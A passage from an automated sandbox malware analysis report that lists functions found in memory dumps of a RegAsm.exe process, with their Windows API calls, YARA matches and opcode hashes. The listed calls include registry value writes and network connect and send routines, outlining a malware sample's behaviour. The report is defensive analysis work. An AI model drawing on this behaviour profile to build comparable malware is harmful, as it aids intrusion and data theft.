                          • Instruction Fuzzy Hash: 23E06532801238FBDF204FA29C0DDEB7F6CDF06BA1B000155BD0CA1111D2258E50E6E4
                          Function 004138B2 Relevance: 4.5, APIs: 3, Instructions: 30registryCOMMON
                          Download Yara Rule
                          APIs
                          • RegCreateKeyA.ADVAPI32(80000001,00000000,004660B4), ref: 004138C0
                          • RegSetValueExA.KERNEL32(004660B4,000000AF,00000000,00000004,00000001,00000004), ref: 004138DB
                          • RegCloseKey.KERNEL32(004660B4), ref: 004138E6
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseCreateValue
                          • String ID:
                          • API String ID: 1818849710-0
                          • Opcode ID: 8a000a4505fdb29c534fdcd469952580260528b50fc1865eb33bc02dff3d936a
                          • Instruction ID: 04d77b696783773a8a307df6842786532c8303179302b097fa31242bc3118ae5
                          • Opcode Fuzzy Hash: 8a000a4505fdb29c534fdcd469952580260528b50fc1865eb33bc02dff3d936a
                          • Instruction Fuzzy Hash: 1EE06D72500318FBDF109FA0DC06FEA7BACEF04B62F104565BF09A6191D6358E14E7A8
                          Function 004187AA Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 138COMMON
                          Download Yara Rule
                          APIs
                          • GdiplusStartup.GDIPLUS(00474ACC,?,00000000,00000000), ref: 004187FA
                            • Part of subcall function 004048C8: connect.WS2_32(FFFFFFFF,00D64950,00000010), ref: 004048E0
                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: GdiplusStartupconnectsend
                          • String ID: NG
                          • API String ID: 1957403310-1651712548
                          • Opcode ID: ac95375dd8309d9e0ed2265105671e99074506a039fa72e05eb7aa568a42b0db
                          • Instruction ID: 646e85ae029ebb21aec6d49858a727e037fa7bb3a6359959f193cd142bf324ca
                          • Opcode Fuzzy Hash: ac95375dd8309d9e0ed2265105671e99074506a039fa72e05eb7aa568a42b0db
                          • Instruction Fuzzy Hash: 8E41D4713042015BC208FB22D892ABF7396ABC0358F50493FF54A672D2EF7C5D4A869E
                          Function 10006ACB Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON
                          Download Yara Rule
                          APIs
                          • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 10006AF0
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884960660.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 00000009.00000002.884956553.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884960660.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                          Similarity
                          • API ID: Info
                          • String ID:
                          • API String ID: 1807457897-3916222277
                          • Opcode ID: 6cedc9456a51a48c8b79c853d380540c5183232597a17884e183f7c8afc1900e
                          • Instruction ID: 7792c4a5177154c3e9ca344f7bd1be717728489360a1cc3eced530dab922c6d1
                          • Opcode Fuzzy Hash: 6cedc9456a51a48c8b79c853d380540c5183232597a17884e183f7c8afc1900e
                          • Instruction Fuzzy Hash: D241FCB050429C9AFB21CF148C84BEABBEAEB49344F2444EDE5C9C6146D735AA85DF20
                          Function 0044EE44 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON
                          Download Yara Rule
                          APIs
                          • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 0044EE69
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Info
                          • String ID:
                          • API String ID: 1807457897-3916222277
                          • Opcode ID: c218bb7fec2994ea758599c37fad7e7d2b1b4cc9144a8923480740bb4dc68c2e
                          • Instruction ID: 2d4132b881e94a0a9fd0de77a922cbe9b4a8b8c61ff6a95216f325efaac8b060
                          • Opcode Fuzzy Hash: c218bb7fec2994ea758599c37fad7e7d2b1b4cc9144a8923480740bb4dc68c2e
                          • Instruction Fuzzy Hash: 7E411070504748AFEF218E25CC84AF7BBB9FF45304F2404EEE59987142D2399A46DF65
                          Function 00409E1F Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: _wcslen
                          • String ID: ;|
                          • API String ID: 176396367-2167424691
                          • Opcode ID: 5581d9da4b44419582c52f90d2dac08d2b870ca85f72c258eca40ba8ececd965
                          • Instruction ID: e26466b944e621eef81fbe5db30e3e3b172770e45cde188e8c087a2518f8d89f
                          • Opcode Fuzzy Hash: 5581d9da4b44419582c52f90d2dac08d2b870ca85f72c258eca40ba8ececd965
                          • Instruction Fuzzy Hash: 631181319002059BCB15EF66E852AEF7BB4AF54314B10413FF446A62E2EF78AD15CB98
                          Function 10005F19 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMON
                          Download Yara Rule
                          APIs
                          • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,5EFC4D8B,00000100,?,5EFC4D8B,00000000), ref: 10005F8A
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884960660.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 00000009.00000002.884956553.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884960660.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                          Similarity
                          • API ID: String
                          • String ID: LCMapStringEx
                          • API String ID: 2568140703-3893581201
                          • Opcode ID: 9311d150e09a2ea236c127db5a9a9399c35e1f3cdcd5bb094b510bbe54d2b48d
                          • Instruction ID: 984c2aabb43d86beb2eff1d34daabde68608d0bd8f0a2971fe4c3ea005c0c61c
                          • Opcode Fuzzy Hash: 9311d150e09a2ea236c127db5a9a9399c35e1f3cdcd5bb094b510bbe54d2b48d
                          • Instruction Fuzzy Hash: 9401D332500159BBEF129F90CC05EEE7F66EF08390F018115FE1826124CB369971AB95
                          Function 00448C33 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000001,?,?), ref: 00448CA4
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: String
                          • String ID: LCMapStringEx
                          • API String ID: 2568140703-3893581201
                          • Opcode ID: 4e10c201ebb2099c74eb4779768ff64867bf24b434018514e16e99dc8bd4ef65
                          • Instruction ID: c3f282dcf0fd97a5c368a601407465e3bede0a00add2935535d0592c00eac712
                          • Opcode Fuzzy Hash: 4e10c201ebb2099c74eb4779768ff64867bf24b434018514e16e99dc8bd4ef65
                          • Instruction Fuzzy Hash: 3001253254120CFBCF02AF91DD02EEE7F66EF08751F04416AFE1965161CA3A8971EB99
                          Function 00448B04 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • InitializeCriticalSectionAndSpinCount.KERNEL32(00000FA0,-00000020,0044BFCF,-00000020,00000FA0,00000000,00467388,00467388), ref: 00448B4F
                          Strings
                          • InitializeCriticalSectionEx, xrefs: 00448B1F
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: CountCriticalInitializeSectionSpin
                          • String ID: InitializeCriticalSectionEx
                          • API String ID: 2593887523-3084827643
                          • Opcode ID: 6340ef5d4d263af2985355ee658efc66a6ef890db148a952ff0e7e01781af4fe
                          • Instruction ID: 6b0d226957fc5e3530c80ec385177705bb254131620a7d42d33c8bf65efe755d
                          • Opcode Fuzzy Hash: 6340ef5d4d263af2985355ee658efc66a6ef890db148a952ff0e7e01781af4fe
                          • Instruction Fuzzy Hash: F0F0E93164021CFBCB025F55DC06E9E7F61EF08B22B00406AFD0956261DF3A9E61D6DD
                          Function 10005D5C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884960660.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 00000009.00000002.884956553.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884960660.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                          Similarity
                          • API ID: Alloc
                          • String ID: FlsAlloc
                          • API String ID: 2773662609-671089009
                          • Opcode ID: 5ade6ed448300679f83b5d20ac83fd3ad7347746afaf7e54a560ff76d56e46a0
                          • Instruction ID: c304bc83fd0672a576945d725d7c66755e55876121cef6cfa1c70df20931aaa1
                          • Opcode Fuzzy Hash: 5ade6ed448300679f83b5d20ac83fd3ad7347746afaf7e54a560ff76d56e46a0
                          • Instruction Fuzzy Hash: 43E0E535600228ABF325EB608C15EEFBBA4DB583D1B01405AFE0966209CE326D0185D6
                          Function 00448790 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Alloc
                          • String ID: FlsAlloc
                          • API String ID: 2773662609-671089009
                          • Opcode ID: 8d34d378e792ffc8bee28f5c2a12e2aa67d49de27489c3fe41b8e68b567a8336
                          • Instruction ID: f8901b274c9ac7999680b04b2037e580393277d5e39e0d99f0e7f02c98ef4e36
                          • Opcode Fuzzy Hash: 8d34d378e792ffc8bee28f5c2a12e2aa67d49de27489c3fe41b8e68b567a8336
                          • Instruction Fuzzy Hash: 8FE05530640318F7D3016B21DC16A2FBB94DB04B22B10006FFD0553241EE794D15C5CE
                          Function 004489D7 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30timeCOMMON
                          Download Yara Rule
                          APIs
                          • GetSystemTimeAsFileTime.KERNEL32(00000000,0043AB37), ref: 00448A16
                          Strings
                          • GetSystemTimePreciseAsFileTime, xrefs: 004489F2
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Time$FileSystem
                          • String ID: GetSystemTimePreciseAsFileTime
                          • API String ID: 2086374402-595813830
                          • Opcode ID: c8476c07d91a2673d79eb1bf06ec4ca2dbc9f8e1099c36818990a3b57f66e430
                          • Instruction ID: bacba389ed7ed90706db716b221aab5ed2509560655679cc0f09f15d90276a03
                          • Opcode Fuzzy Hash: c8476c07d91a2673d79eb1bf06ec4ca2dbc9f8e1099c36818990a3b57f66e430
                          • Instruction Fuzzy Hash: 79E0E531A81618FBD7116B25EC02E7EBB50DB08B02B10027FFC05A7292EE754D14D6DE
                          Function 0041B80C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 26COMMON
                          Download Yara Rule
                          APIs
                          • GlobalMemoryStatusEx.KERNEL32(?), ref: 0041B824
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: GlobalMemoryStatus
                          • String ID: @
                          • API String ID: 1890195054-2766056989
                          • Opcode ID: 1ad00b6035bb2f9c69a92d20b28944e38dc856d82cbe2acb3b3194101eb7e45b
                          • Instruction ID: 3917006bb4bdf28dbebd301c315ba2c969ca89c82ab29e5da1363915d2377671
                          • Opcode Fuzzy Hash: 1ad00b6035bb2f9c69a92d20b28944e38dc856d82cbe2acb3b3194101eb7e45b
                          • Instruction Fuzzy Hash: EBE0C9B6901228EBCB10DFA9E94498DFBF8FF48620B008166ED08A3704D770A815CB94
                          Function 10003AF1 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22COMMON
                          Download Yara Rule
                          APIs
                          • try_get_function.LIBVCRUNTIME ref: 10003B06
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884960660.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 00000009.00000002.884956553.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884960660.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                          Similarity
                          • API ID: try_get_function
                          • String ID: FlsAlloc
                          • API String ID: 2742660187-671089009
                          • Opcode ID: e5392f9aa55551a50589cb99c6148b67437594651e03cd2756b54b563a9e1daf
                          • Instruction ID: 0b7c7f44018c04906f4f2ef9afae3f4f684564eee465a9a4c05fe82f6616737e
                          • Opcode Fuzzy Hash: e5392f9aa55551a50589cb99c6148b67437594651e03cd2756b54b563a9e1daf
                          • Instruction Fuzzy Hash: 13D02B32744138B3F201B3A06C04BEEBB88D7025F2F040063FB4C5210CDB11591042E6
                          Function 00438E14 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22COMMON
                          Download Yara Rule
                          APIs
                          • try_get_function.LIBVCRUNTIME ref: 00438E29
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: try_get_function
                          • String ID: FlsAlloc
                          • API String ID: 2742660187-671089009
                          • Opcode ID: 1eb4f256e7c4e0b4dee7f2b7c001ffdd8c026b266bbfd6c5aa47d90a079f9e5b
                          • Instruction ID: b64d3ab94c56a33c1928a034b10f94234fe941941be7f39555266fb58f36a209
                          • Opcode Fuzzy Hash: 1eb4f256e7c4e0b4dee7f2b7c001ffdd8c026b266bbfd6c5aa47d90a079f9e5b
                          • Instruction Fuzzy Hash: 09D02B31BC1328B6C51032955C03BD9B6048B00FF7F002067FF0C61283899E592082DE
                          Function 0041B847 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 17COMMON
                          Download Yara Rule
                          APIs
                          • GlobalMemoryStatusEx.KERNEL32(?), ref: 0041B85B
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: GlobalMemoryStatus
                          • String ID: @
                          • API String ID: 1890195054-2766056989
                          • Opcode ID: 2ff32e62116e468e6d8a54eb6c0bfd9d688f6c12eac0596ef65494206548ed21
                          • Instruction ID: 2d2b64c70bc766df394076410504e3f9c8f669937c614d63c6700d8895b1c70c
                          • Opcode Fuzzy Hash: 2ff32e62116e468e6d8a54eb6c0bfd9d688f6c12eac0596ef65494206548ed21
                          • Instruction Fuzzy Hash: E6D017B58023189FC720DFA8E804A8DBBFCFB08210F00456AEC49E3700E770E8008B94
                          Function 10006E20 Relevance: 3.2, APIs: 2, Instructions: 168COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 100069F3: GetOEMCP.KERNEL32(00000000,?,?,10006C7C,?), ref: 10006A1E
                          • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,10006CC1,?,00000000), ref: 10006E94
                          • GetCPInfo.KERNEL32(00000000,10006CC1,?,?,?,10006CC1,?,00000000), ref: 10006EA7
                          Memory Dump Source
                          • Source File: 00000009.00000002.884960660.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 00000009.00000002.884956553.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884960660.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                          Similarity
                          • API ID: CodeInfoPageValid
                          • String ID:
                          • API String ID: 546120528-0
                          • Opcode ID: 4adf61bb8ef5ba689b58ef35b1aaecca0a92cbb4d0ae1edbfb61d6a665a170f3
                          • Instruction ID: 1dd91d3823b6bb4934ca9945ee4913e93bf289da146d72ec34fd0236562290e4
                          • Opcode Fuzzy Hash: 4adf61bb8ef5ba689b58ef35b1aaecca0a92cbb4d0ae1edbfb61d6a665a170f3
                          • Instruction Fuzzy Hash: 91513474E043469EFB21CF71DC916BBBBE6EF49280F20807EE48687156D735DA458B90
                          Function 0044F199 Relevance: 3.2, APIs: 2, Instructions: 168COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0044ED6C: GetOEMCP.KERNEL32(00000000,?,?,0044EFF5,?), ref: 0044ED97
                          • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0044F03A,?,00000000), ref: 0044F20D
                          • GetCPInfo.KERNEL32(00000000,0044F03A,?,?,?,0044F03A,?,00000000), ref: 0044F220
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: CodeInfoPageValid
                          • String ID:
                          • API String ID: 546120528-0
                          • Opcode ID: 747d95ecf2005c527016839393fb107aa8d78a19bbf0a74999b8906be39dfc0a
                          • Instruction ID: 491245c4813b68437391e3e70942b885a5b84425ef1b1be509cf98dd56c33fdc
                          • Opcode Fuzzy Hash: 747d95ecf2005c527016839393fb107aa8d78a19bbf0a74999b8906be39dfc0a
                          • Instruction Fuzzy Hash: A05153749002469EFB208F76C8816BBBBE4FF01304F1480BFD48687251E67E994A8B99
                          Function 10006C5F Relevance: 3.1, APIs: 2, Instructions: 91COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 10005AF6: GetLastError.KERNEL32(?,?,10006C6C), ref: 10005AFA
                            • Part of subcall function 10005AF6: _free.LIBCMT ref: 10005B2D
                            • Part of subcall function 10005AF6: SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B6E
                            • Part of subcall function 10005AF6: _abort.LIBCMT ref: 10005B74
                            • Part of subcall function 10006D7E: _abort.LIBCMT ref: 10006DB0
                            • Part of subcall function 10006D7E: _free.LIBCMT ref: 10006DE4
                            • Part of subcall function 100069F3: GetOEMCP.KERNEL32(00000000,?,?,10006C7C,?), ref: 10006A1E
                          • _free.LIBCMT ref: 10006CD7
                          • _free.LIBCMT ref: 10006D0D
                          Memory Dump Source
                          • Source File: 00000009.00000002.884960660.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 00000009.00000002.884956553.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884960660.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                          Similarity
                          • API ID: _free$ErrorLast_abort
                          • String ID:
                          • API String ID: 2991157371-0
                          • Opcode ID: edadbe4ca17b1bb3a790d59a6ed19414cc5eb62636eebdfc00c28812a33e9cae
                          • Instruction ID: 62e76a57c0cb8018fa5258269fd2d3c97d0f5aa08c1c35bbbea2ca126a332e06
                          • Opcode Fuzzy Hash: edadbe4ca17b1bb3a790d59a6ed19414cc5eb62636eebdfc00c28812a33e9cae
                          • Instruction Fuzzy Hash: AB31D835904249AFF700CB69DD81B5D77F6EF493A0F3141A9E8049B295EB76AD40CB50
                          Function 0044EFD8 Relevance: 3.1, APIs: 2, Instructions: 91COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                            • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                            • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                            • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                            • Part of subcall function 0044F0F7: _abort.LIBCMT ref: 0044F129
                            • Part of subcall function 0044F0F7: _free.LIBCMT ref: 0044F15D
                            • Part of subcall function 0044ED6C: GetOEMCP.KERNEL32(00000000,?,?,0044EFF5,?), ref: 0044ED97
                          • _free.LIBCMT ref: 0044F050
                          • _free.LIBCMT ref: 0044F086
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: _free$ErrorLast_abort
                          • String ID:
                          • API String ID: 2991157371-0
                          • Opcode ID: 5c488e73cd7317a59bb91e94e032dcb6bf067ffc0982221c2c2ef85a747d1bec
                          • Instruction ID: a9f826519387c1ac895116d2974c89b4af6d1f604a138ae73dd4863203302c4b
                          • Opcode Fuzzy Hash: 5c488e73cd7317a59bb91e94e032dcb6bf067ffc0982221c2c2ef85a747d1bec
                          • Instruction Fuzzy Hash: 2D31D371900104AFEB10EB69D441B9A77F4EF81325F2540AFE5049B2A3DB7A5D44CB58
                          Function 0044854A Relevance: 3.1, APIs: 2, Instructions: 65libraryloaderCOMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • GetProcAddress.KERNEL32(00000000,?,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue,0045F170,0045F178,00000000,00000364,?,00448367,00000000), ref: 004485AA
                          • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 004485B7
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressProc__crt_fast_encode_pointer
                          • String ID:
                          • API String ID: 2279764990-0
                          • Opcode ID: c6cf5396499d17f56fb6a2281c71017d1bec5fc69850f55703e39bd70672811c
                          • Instruction ID: be9fc4cf4793659cabcfb8eeb6b3f823a3a139bea871a56029073562aa2b3f0c
                          • Opcode Fuzzy Hash: c6cf5396499d17f56fb6a2281c71017d1bec5fc69850f55703e39bd70672811c
                          • Instruction Fuzzy Hash: 4B110637A00220BBFB229F1DDC4096F7395AB84364716866AFD19EB354DF34EC4186D9
                          Function 00446206 Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • _free.LIBCMT ref: 00446227
                            • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                          • RtlReAllocateHeap.NTDLL(00000000,00000000,?,?,0000000F,00000000,00432F93,00000000,0000000F,0042F99D,?,?,00431A44,?,?,00000000), ref: 00446263
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: AllocateHeap$_free
                          • String ID:
                          • API String ID: 1482568997-0
                          • Opcode ID: b10fa1e8472e683284d1f6c52ed4eb802d80ccb8cfc65d6c0dd02300a023487f
                          • Instruction ID: 528349031ecf72c594af6ac828cc426c74ce8c7b4bfa82022820746e0f177899
                          • Opcode Fuzzy Hash: b10fa1e8472e683284d1f6c52ed4eb802d80ccb8cfc65d6c0dd02300a023487f
                          • Instruction Fuzzy Hash: 4CF0283110121176BB213B266C01B6B3759AF83B70B1700ABFC1466281CFBCCC41406F
                          Function 0040482D Relevance: 3.0, APIs: 2, Instructions: 40networkCOMMON
                          Download Yara Rule
                          APIs
                          • socket.WS2_32(00000002,00000001,00000006), ref: 00404852
                          • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,0040530B,?,?,00000000,00000000,?,?,00000000,00405208,?,00000000), ref: 0040488E
                            • Part of subcall function 0040489E: WSAStartup.WS2_32(00000202,00000000), ref: 004048B3
                          Memory Dump Source
